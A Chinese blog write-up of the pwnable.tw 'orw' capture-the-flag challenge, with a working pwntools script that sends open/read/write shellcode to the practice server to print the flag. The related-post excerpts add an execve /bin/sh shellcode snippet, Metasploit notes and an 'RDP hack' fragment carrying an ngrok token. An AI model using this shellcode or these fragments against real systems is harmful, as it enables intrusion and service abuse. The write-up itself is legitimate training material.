pwnable.tw - orw

最新推荐文章于 2023-05-03 15:57:37 发布
最新推荐文章于 2023-05-03 15:57:37 发布
阅读量3k 收藏
点赞数 1
分类专栏: 二进制漏洞 Linux 文章标签: pwn 二进制漏洞 pwnable.tw
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/tan6600/article/details/80967853
版权

简单概览

image_1chkkmh6m17j9j0c85t1l11ustp.png-22.3kB
与 start 不同,该程序使用动态链接

提示仅允许有限的系统调用 open read write 函数

程序运行

image_1chl27d7lfgvl8siov1m5r17bi16.png-8.9kB
哪怕是输入一个字母,程序仍然会出现段错误

检查安全措施

image_1chl2bs2s1f1g106g1csk1h872mn1j.png-14kB
可见栈上开了 CANARY

程序

在 IDA 中反编译可见:
image_1chl3sf5r19ck7eu1dnh1k1i16ht19.png-9.6kB
函数 orw_seccomp 反编译:
image_1chl5lhcibrr3p1cj51ada1mkd1m.png-16.9kB

程序从终端读入内容,存放在 shellcode,然后执行该命令

所以大体过程为先 open 文件,然后 read 读出内容,再 write 打印到终端

from pwn import *
open_shellcode = "xor ecx,ecx;xor edx,edx;mov eax,0x5;push 0x00006761;push 0x6c662f77;push 0x726f2f65;push 0x6d6f682f;mov ebx,esp;int 0x80;"
read_shellcode = "mov eax,0x3;mov ecx,ebx;mov ebx,0x3;mov edx,0x40;int 0x80;"
write_shellcode = "mov eax,0x4;mov ebx,0x1;mov edx,0x40;int 0x80;"
shellcode = open_shellcode + read_shellcode + write_shellcode
payload = asm(shellcode)
io = remote("chall.pwnable.tw", 10001)
io.recvuntil("shellcode:")
io.sendline(payload)
print io.recv()
io.interactive()

/home/orw/flag 转换为 16 进制为 2f686f6d652f6f72772f666c6167,即压栈数据,还要补零

执行就可以得到 flag

PolluxAvenger
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
pwnable.tw 1~5 心累
qq_42192672的博客
12-02 599
听说很难,来找虐 1.Start [100 pts] 之前湖湘杯有一题啥防护措施都没开启,我就不会做,所以不敢开心的太早 拖进IDA,这啥东西 还是直接看汇编吧 这是个系统调用 大概就是系统中断之后直接调用吧,边上有注释,不然我直接凉了 来,看一下汇编 先把地址给ecx,给了给长度范围,饭后执行标准输出,输出到终端,然后执行写操作 进入写函数以后,标准读入,长度还是2...
pwnable.tworw
最新发布
qq_61670993的博客
09-22 106
32位orw,很简单没啥好说的。
pwnable.tw-orw
qq_35661990的博客
10-27 456
Read the flag from /home/orw/flag. Only open read write syscall are allowed to use. nc chall.pwnable.tw 10001 这是pwnable.tw orw的题目描述,只能用syscall只能用open、read、write 从ida看源代码 int __cdecl main(int ar...
pwnable.tw start,orw学习
weixin_46521144的博客
07-06 206
暑假开始刷pwnable.tw start 这个反编译出来一开始看蒙了,不知道在干啥。后来仔细看看字节码,发现是系统调用write输出的stack上的内容。 后面是read函数,观察修改的寄存器内容 发现是read系统调用,输入数据大小为0x3c 然而buffer大小为0x14,这就产生了栈溢出。这里是把一个shellcode放到返回地址,那就需要知道返回的栈地址,这里比较巧妙。注意到 这里将打印esp地址中的数据,只要返回ret的时候调用,就可以输出esp地址,在下一次放在re
Pwnable.tw orw [Writeup]
柷敔的博客
02-18 548
题源 https://pwnable.tw/challenge/#2 题解 先看一下安全保护情况 再IDA一下源码 其中seccomp是一个开启内核system call保护的函数。通过这一函数可以划定程序准许用户态调用的系统函数,相当于划定白名单,即题目所言【仅开启了open、write、read】。 简单分析函数可知,该程序直接执行了用户输入的shellcode。结合题目意思,可以使用open函数打开flag文件,然后read读出文件内容,最后write输出到控制台。 使用的python程序如下:
PWNABLE.TW(1)
njh18790816639的博客
12-30 271
Start from pwn import * context(log_level='debug',os='linux',arch='i386') binary = './start' r = remote('chall.pwnable.tw', 10000) #r = process(binary) elf = ELF(binary) def db(): gdb.attach(r) leak_esp = 0x08048087 shellcode = asm("xor ecx,ecx;\
PWN刷题】Pwnable-Start、Pwnable-orw
QYbudong的博客
05-03 1474
③思路:打开文件sys_open('/home/orw/flag',0,0),读取文件sys_read(3,flag,0x100),写入标准输出sys_write(1,flag,0x30)。当然也可以用上边所说的,自己写汇编然后用asm生成shellcode,这种比较标准的函数还是建议用shellcraft,比较方便。这里解释一下,0x68732f6e和0x69622f2f组合在一起是hs/nib//,也就是binsh的小端序写法;而0xb,也就是11,是execve的系统调用号。入门级题目,保护全关。
pwnable.tw---orw
杀生丸?不,其实我要的是桔梗
05-01 1549
pwnable.tworw 这题主要考验的是shellcode的自我制作,建议学会Linux Sysycall Reference 再来,或者第一题start彻底搞会。 题目分析: 照例: 就开了栈保护,虽然都没有什么用。 题目开始就是让你输入shellcode。 就用msf随便试了几下,发现有些被过滤了。 调试看看: 发现调用了seccomp,百度了下是一个linu...
pwnable.tw start&orw
weixin_30809173的博客
01-24 161
emm,之前一直想做twpwnable苦于没有小飞机(,今天做了一下发现都是比较硬核的pwn题目,对于我这种刚入门?的菜鸡来说可能难度刚好(orz 1.start   比较简单的一个栈溢出,给出一个linux 0x80系统调用的参考网址,就决定是他了 参考之可以发现al=0x3执行sys_read时长度是0x3c*size_sz,栈的长度是0x14,明显的栈溢出。由于没有开启NX,所以直接...
欧姆龙omronPLC指令.pdf
11-16
- `ANDW`,`ORW`,`XORW`:双字逻辑与、或、异或,用于处理双字型数据的逻辑运算。 - `NEG`:求补指令,用于计算二进制数的补码。 6. **浮点数处理指令**: - `FIX`,`FLT`:浮点数与整数之间的转换。 - `+F`,...
欧姆龙omronPLC指令.docx
11-16
逻辑指令(如ANDW、ORW、XORW、COM等)用于执行位级逻辑运算。 浮点数处理指令(如FIX、FLT、+F、-F、/F、*F等)支持浮点数的运算,这在处理精度要求高的数学问题时是必不可少的。 子程序和中断控制指令允许编写可...
aserteee:我的GitHub个人资料的配置文件
03-22
职位: 作业:Create_Windows_2019_Azure_...脚本: 回声ngrok的authToken “1q6MPXb3oRW5wyDpZkfqLaw2lMh_46EQ4JLUPuaCW3MRrQwGL”> NGROK.bat卷曲-s -O AzureNgrokAutoRegion.bat显示名: '运行RDP哈克在Azure管道'
MECH3780 CFD Major Assignment.docx
10-21
2. 有专门的解释视频(https://youtu.be/p7dBNUH3oRw)来辅助理解和完成作业。 3. 如果有任何疑问,可以联系lyazid.djenidi@newcastle.edu.au获取帮助。 **作业提交流程:** 1. 使用提供的模板完成两个工程报告。 2...
vagrant-neosdev:TYPO3 Neos 和 Flow 通用开发服务器
05-31
已弃用! 请参阅 (使用 ansible 代替 puppet) MOC TYPO3 Neos and Flow 通用开发服务器 用于在类似于 MOC 托管生产机器的环境中开发 TYPO3 Flow 和 Neos 站点...sudo mount -orw -oresvport -t nfs 192.168.66.80:/
Metasploit 学习笔记
热门推荐
不急不躁
07-11 2万+
在Kali中使用Metasploit,需要先开启PostgreSQL数据库服务和Metasploit服务 然后就可以完整的利用 msf 数据库查询 exploit 和记录service postgresql start service metasploit start如果不想每次开机都这样,还可以配置随系统启动update-rc.d postgresql enable update-rc.d me
Metasploit 整理笔记
不急不躁
07-12 1万+
一.名词解释 exploit 测试者利用它来攻击一个系统,程序,或服务,以获得开发者意料之外的结果。常见的 有内存溢出,网站程序漏洞利用,配置错误exploit。 payload 我们想让被攻击系统执行的程序,如reverse shell 可以从目标机器与测试者之间建立一 个反响连接,bind shell 绑定一个执行命令的通道至测试者的机器。payload 也可以是只 能在目标机器上
Kali 2.0 使用 Reaver 的注意事项
不急不躁
01-12 1万+
1、刚一开始使用这条命令 airmon-ng start wlan0 就可以开始了,需要注意的是,在Kali 2.0里开启的不再是mon0了,而是wlan0mon,所以不要和 Kali 1.X 的版本代码混淆2、Kali 1.X 的命令无效在Kali 2.0 中必须自己手动开启网卡的监听模式,所以在执行完上面之后,需要自己手动开启监听模式ifconfig wlan0mon down iwconfig
“复制”Linux系统
不急不躁
01-26 7450
如果你装好的服务器需要批量“复制”安装,手动安装会不会累死人,我们应该选一个更为轻松的方案 以下方案仅讨论Linux系统(Windows系统下有Ghost和Sysprep两种方法,个人推荐在图方便的情况下使用Ghost,如果想让每台的SID号不同就不能使用Ghost而要使用Sysprep才可以1、DockerDocker几乎可以运行在任何Linux系统(64位)上,像Ubuntu的新版本都是自带D
西门子S7-300编程语句详解
13. **字逻辑指令**:处理字级别的逻辑运算,如ANDW(字与)、ORW(字或)、XORW(字异或)等。 14. **累加器操作指令**:涉及累加器的使用,如ACCU_ADD(累加)、ACCU_SUB(累减)等,累加器在计算过程中保存中间...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值